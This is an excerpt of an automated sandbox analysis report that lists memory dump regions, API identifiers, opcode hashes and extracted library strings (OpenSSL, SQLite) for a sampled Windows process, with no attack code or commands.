                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                                                                                                                                              • Opcode ID: aea56f64fe44ad7b0340a1766d39962d55ffaa5f78c982329402f1f7499899da
                                                                                                                                                                                                                                                              • Instruction ID: f0eea199c81feaa4f10038f3e24fb7ebd0eb46651664c6a123000a19f44e4c09
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aea56f64fe44ad7b0340a1766d39962d55ffaa5f78c982329402f1f7499899da
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF31E532A0EB91AAE7649E25945127D33B5EF64FC4F589435DE08C7685CF3DE842C740
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3568877910-0
                                                                                                                                                                                                                                                              • Opcode ID: aa13d94df53dad11d29fd15ccb850683b36ec86aa41e0cb0c7996d899546b7bb
                                                                                                                                                                                                                                                              • Instruction ID: a9f4872ba3992031bfa811beb8db176b57f5d1fd822b1f8507bb48a0a29c966d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa13d94df53dad11d29fd15ccb850683b36ec86aa41e0cb0c7996d899546b7bb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76219A3260AB4096DB15CF11E4801AEB3A8FF88BC4B844635DB9D03768EF38E251C744
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: send
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2809346765-0
                                                                                                                                                                                                                                                              • Opcode ID: 6b627887be14beab393af873e730b8ecaeea971ac98b42c89ec63ae5f2cd1be8
                                                                                                                                                                                                                                                              • Instruction ID: 7e3f7f8985a71c22b512a9b7177690aca23e2b346d78ec1dc0d3a541cda9a7c5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b627887be14beab393af873e730b8ecaeea971ac98b42c89ec63ae5f2cd1be8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97E0EDB1B0064982DB289B19D49123963A1EB09FA4F245735DE3D8B3D0CE2CD8E1C340
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                                                                                                                                              • Opcode ID: 7996a06857c3f91e8426b2d630f3f6f22c05bb801b80ee25fc1232160325fa23
                                                                                                                                                                                                                                                              • Instruction ID: d4ed2cc819a7e6d8b088ebd5ad0942470a0e97e548115825b46c034ed7f3a786
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7996a06857c3f91e8426b2d630f3f6f22c05bb801b80ee25fc1232160325fa23
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68319232A0EA92AAF7749E25944127D72B5EF64BC4F149431DE0DC7685CF3DE882CB80
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                                                                                                                                              • Opcode ID: 549c9418ccfda40514b604c35745b668e5ba7805ab55c6a8479e28d837946d2b
                                                                                                                                                                                                                                                              • Instruction ID: 5cc671a3634c0df63c7080b87b1e9f1e617ce5b69aad499f1295fd60378b76f1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 549c9418ccfda40514b604c35745b668e5ba7805ab55c6a8479e28d837946d2b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6216D3260878097E3589F22A98029AB3A9FB88BD4F544135EB9887F59CF7CE455CB04
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                                                                                                                                              • Opcode ID: ffd3714810fece18b63243a8f0a43d4e35894e222ddb91346eb91433d1a1336c
                                                                                                                                                                                                                                                              • Instruction ID: b42c2eb0ed1b93cd6e88812e2192382065935db309c73fecbb563e5cab6bc59e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ffd3714810fece18b63243a8f0a43d4e35894e222ddb91346eb91433d1a1336c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31F04F31A1DBD195E3049F16F8402AAA364FB85FC0F188035EE9D87FAACE7CD5418744
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485371418.00007FF8B7E11000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B7E10000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485330634.00007FF8B7E10000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485371418.00007FF8B7E30000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485371418.00007FF8B7E39000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485371418.00007FF8B7E3D000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485534943.00007FF8B7E40000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485575820.00007FF8B7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e10000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                                              • String ID: %X:%X:%X:%X:%X:%X:%X:%X$%d.%d.%d.%d$<INVALID>$<invalid>$DNS$DirName$IP Address$Invalid value %.200s$Registered ID$URI$Unknown general name type %d$email$failed to allocate BIO
                                                                                                                                                                                                                                                              • API String ID: 3568877910-4109427827
                                                                                                                                                                                                                                                              • Opcode ID: 01c2fd40f2c5ea4e9aeed28cc21b31da44747e28ed5f3481235f04e043f187b7
                                                                                                                                                                                                                                                              • Instruction ID: 05db0a8b2d9064cf9b7930f440ed51bec18af44a1006560aee28395a216c4f22
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01c2fd40f2c5ea4e9aeed28cc21b31da44747e28ed5f3481235f04e043f187b7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFF15721A0CB9286EAA5CB2DA85653E67A1BF85FD1F044431CB5E46FB4EF3CE504D710
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                                              • String ID: Bad ptr map entry key=%u expected=(%u,%u) got=(%u,%u)$Failed to read ptrmap key=%u$Freelist: $Page %u: never used$Page %u: pointer map referenced$incremental_vacuum enabled with a max rootpage of zero$max rootpage (%u) disagrees with header (%u)
                                                                                                                                                                                                                                                              • API String ID: 3568877910-741541785
                                                                                                                                                                                                                                                              • Opcode ID: 052523f2d31702d875edfec471e5345a8572d438cc203e263a3081f135eacc59
                                                                                                                                                                                                                                                              • Instruction ID: dd231424ea1a51e78e388b423bde21134e3db0d3fe72ee7d75b33c602866b301
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 052523f2d31702d875edfec471e5345a8572d438cc203e263a3081f135eacc59
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B02DE32F4A756AAEB14CB26D44427D77A1FB84784F14413ADA4E47B94DFBCE840CB24
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                                              • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                                                                                                              • API String ID: 3568877910-463513059
                                                                                                                                                                                                                                                              • Opcode ID: 5706e4366017c66d0b5729bbe7d8a5c60fba8519cf79620487a4e92b633df847
                                                                                                                                                                                                                                                              • Instruction ID: 3d9437e67bfea21e7ea99a4dbc57e8f09a111b63cfbc03879fd5269d8e06c4e6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5706e4366017c66d0b5729bbe7d8a5c60fba8519cf79620487a4e92b633df847
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DEE13252B1E3CA67EF0D8B3964151786B90EB557C0F88813ADAAE437D1DF2CB512CE24
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2480153841.00007FF8A8181000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FF8A8180000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480032989.00007FF8A8180000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480153841.00007FF8A81E2000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480153841.00007FF8A822E000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480153841.00007FF8A8231000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480153841.00007FF8A8236000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480153841.00007FF8A8290000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480153841.00007FF8A8293000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480153841.00007FF8A8295000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480153841.00007FF8A8298000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2481039753.00007FF8A8299000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2481081086.00007FF8A829B000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a8180000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3558122275-0
                                                                                                                                                                                                                                                              • Opcode ID: d5821aaf4936ad9aa18e348792a4e6496cc638c229f42c96d8f2983ca85ed40f
                                                                                                                                                                                                                                                              • Instruction ID: 85df80f58ed4cfe035ca0c0a8b5aa7ef48562fc9d7e1e19cc51451c888d22a75
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5821aaf4936ad9aa18e348792a4e6496cc638c229f42c96d8f2983ca85ed40f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF31827260AB81D6EB618F60E8513ED7364FB84788F48403ADA4E47B95DF3CD648C724
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007C6126570
                                                                                                                                                                                                                                                              • String ID: ..\s\ssl\ssl_ciph.c$SECLEVEL=$STRENGTH$ssl_cipher_process_rulestr
                                                                                                                                                                                                                                                              • API String ID: 800424832-331183818
                                                                                                                                                                                                                                                              • Opcode ID: 84b29b3f3c5a8ddb94d30c590e50ba50e9e9283ac966815b6dbbe67d5f37e6b5
                                                                                                                                                                                                                                                              • Instruction ID: 844558c61d5c0b9ffa7bda531c613e10ad895a1cf3ed75bab24c749c467a6a3e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 84b29b3f3c5a8ddb94d30c590e50ba50e9e9283ac966815b6dbbe67d5f37e6b5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6AE19372A0D6C65AF7648E2DA48077A7FE9FB457C4F105035DAADC3698EB3CE8418B00
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                                                              • Opcode ID: a32b81c2ff6dfccb19a9728fe67c5763d4d0aea259f9004b58da64eb6530d66a
                                                                                                                                                                                                                                                              • Instruction ID: 0bd23a50453fb659f648ead88f654aeae05f26b8bd79584f015443373e0a7887
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a32b81c2ff6dfccb19a9728fe67c5763d4d0aea259f9004b58da64eb6530d66a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B315C7661AEC1A9EB608F60E8403ED6370FB84785F445039DA4D87B98DF7CD648C714
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485119166.00007FF8B7DF1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FF8B7DF0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485076175.00007FF8B7DF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485119166.00007FF8B7DFE000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485119166.00007FF8B7E01000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485250154.00007FF8B7E02000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485286720.00007FF8B7E03000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7df0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                                                              • Opcode ID: aefad75713e1d056a1139f6002177c6d3049d0e50abe61c3b809c78e50a920d8
                                                                                                                                                                                                                                                              • Instruction ID: d465442f069ef6efe652f72f75a740602705b9fc047541f75584f0ffc71fff10
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aefad75713e1d056a1139f6002177c6d3049d0e50abe61c3b809c78e50a920d8
